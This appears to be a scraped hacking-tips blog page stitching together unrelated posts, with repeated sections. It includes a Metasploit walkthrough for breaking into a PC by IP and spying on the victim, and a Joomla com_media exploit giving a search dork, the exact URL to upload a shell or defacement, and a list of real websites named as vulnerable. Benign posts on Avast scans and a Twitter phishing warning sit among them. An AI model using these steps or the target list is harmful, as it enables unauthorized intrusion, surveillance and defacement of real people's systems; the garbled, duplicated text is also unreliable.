Hack any PC using IP via Metasploit
Hack any PC using IP via Metasploit
1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
2.) You need PostgreSQL for your database.
Download here:http://www.ihelpgadget.com/
Make sure you use all the defaults or Metasploit won't work!
3.) Now lets get down to business... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.
5.)Now, in the window type:
db_connect postgres:ThePassYouChose@local
The first time you do this you will see lots of text flash buy. Don't worry, this is normal.
6.)Type db_host to make sure you are connected correctly.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
watch the auto-exploitation start, go play Halo for a while, and then come back...
9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
sessions -i ExploitNumber
The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.
How to fast scan full computer
Scan Full Computer Fast With Avast
Asalam-0-Alikum,
1) First go to http://www.avast.com And Download The Trial Version its free.
2) After install Click on Avast icon and go to Security Tab.
![](//2.bp.blogspot.com/-YBY3hNOQxcQ/UfAjUB7KZsI/AAAAAAAAAGQ/RNWhLRoq6vI/s640/Capture.PNG)
3) Go To Antivirus then Scroll down.
4) Then See The Last Option it is Boot Scan Go There and click on Schedule Now And Restart Your Computer.
Asalam-0-Alikum,
1) First go to http://www.avast.com And Download The Trial Version its free.
2) After install Click on Avast icon and go to Security Tab.
3) Go To Antivirus then Scroll down.
4) Then See The Last Option it is Boot Scan Go There and click on Schedule Now And Restart Your Computer.
How to make a invisible folder
How To Make invisible Folder
Today I'm going to teach you how to make a invisible folder.
This can be used for several things.
Today I'm going to teach you how.
1. Right click the "Folder"
Properties -> Customize -> Change Icon
Today I'm going to teach you how to make a invisible folder.
This can be used for several things.
Today I'm going to teach you how.
1. Right click the "Folder"
Properties -> Customize -> Change Icon
Now Click "Apply"
Now you see a invisible folder with a name
Now to get a invisible name press these
Hold alt then PRESS 0160
Then click the Enter key.
Congrats, now you should have a invisible folder
Admin finder
Not seen this on here so thought i'd share it. This is not my program.
Its simply to use so anyone can use it and is pretty successful in finding those admin pages
Its simply to use so anyone can use it and is pretty successful in finding those admin pages
Hack Twitter Using Phishing Method
Hack Twitter Using Phishing Method
There's a scam spreading through Twitter Direct messages (DIVIs) and fake emails. appealing users to visit a fake twitter phishing site i.e "twittler.com". Scam uses a hijacked Twitter account to send out direct messages that appear completely legitimate Security blogger. Janne Ahlberg blogged about this new phishing scam. "This is a nasty trick especially when the sender is someone you know and trust If you receive a suspicious DM or email from a person you know and trust, just warn him/her — the account is most likely hijacked and controlled by the attackers."
The webpage resembles a Twitter login page and is trying to obtain your Twitter login credentials with a domain name looks very similar to original Twitter.com. with two extra word "LL" in it
To play it safe, double-check your browser address bar to make sure that's where you are on orginal website twitter.com before logging in.
If you enter your Twitter username and password into this site. you will become a victim of and the hacker will then control your Twitter account to hack more users via spamming them on your behalf.
What do you do if your account is hacked? Change your password immediately. Check what applications you've given access to your account. Revoke access for any suspicious applications, and delete tweets and DIVIs you sent and received while your account was compromised
Joomla component (com_media) Vulnerability
Joomla component (com_media) Vulnerability [#] Exploit Title: Com_Media (CMS JOOMLA)
[#] Date: 12-06-2013
[#] Author: Sultan Haikal
[#] Version: 2.5
[# ]Tested on: Windows Xp & Linux
[#] Dork :- "inurl:com_media"
[#] TarGet With Example :-
Target :- www.ayrshirebridge.co.uk
Just Add This After The Url :- /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
URL :- http://www.ayrshirebridge.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Click Browse at bottom upload your shell in png or jpej format using tamper data. OR
You can also Simply Upload Your Deface In Txt Format.
FInal :- Deface Goes Here
site.com/images/yourfilename.txt
Eg : http://ayrshirebridge.co.uk/images/x.txt
Thats All :D
[#] Vulnerable Website :
Com_Media Vulnerable Websites :-
www.ayrshirebridge.co.uk
www.magicrete.in
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de